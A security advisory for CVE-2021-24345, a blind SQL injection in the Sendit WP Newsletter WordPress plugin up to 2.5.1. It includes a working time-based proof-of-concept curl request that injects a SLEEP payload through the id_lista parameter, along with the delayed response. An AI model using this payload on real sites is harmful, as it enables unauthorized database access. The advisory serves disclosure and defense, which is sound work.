Sendit WP Newsletter <= 2.5.1 – Authenticated (admin+) SQL Injection | CVE 2021-24345

Description

The page lists-management feature of the plugin, available to Administrator users does not sanitise, validate or escape the id_lista POST parameter before using it in SQL statement, therefore leading to Blind SQL Injection.

Proof of Concept

time curl -i -s -k  -X $'POST' \
    -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: https://example.com' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Referer: https://example.com/wp-admin/admin.php?page=lists-management&delete=1&id_lista=1' \
    -b $'[admin user]' \
    --data-binary $'id_lista=1-IF(MID(VERSION(),1,1)=8,SLEEP(10),0)&com=DEL' \
    $'https://example.com/wp-admin/admin.php?page=lists-management'


Response:
<div class="clear"></div></div><!-- wpwrap -->
<script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
</body>
</html>

0.01s user 0.00s system 0% cpu 20.279 total